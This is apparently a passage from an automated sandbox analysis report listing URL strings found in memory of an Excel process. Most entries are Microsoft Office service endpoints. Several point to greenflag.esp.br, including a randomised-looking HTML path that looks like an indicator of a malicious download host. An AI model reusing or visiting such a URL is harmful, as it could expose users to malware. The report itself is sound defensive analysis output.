00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://entitlement.diagnosticssdf.office.com1
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://graph.windows.net
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://graph.windows.net/https://graph.windows.net
Source: EXCEL.EXE, 00000000.00000003.382049743.000000001330A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.292752348.000000001330A000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp./
Source: EXCEL.EXE, 00000000.00000003.435929445.00000000131E1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489542819.00000000131E1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457370257.00000000131E1000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.html
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.htmlv
Source: EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.comZR
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://hubble.officeapps.live.comtU
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?MBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258140195.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258140195.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://incidents.diagnostics.office.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://incidents.diagnosticssdf.office.comq
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://inclient.store.office.com/gyro/clientl0
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrWL
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
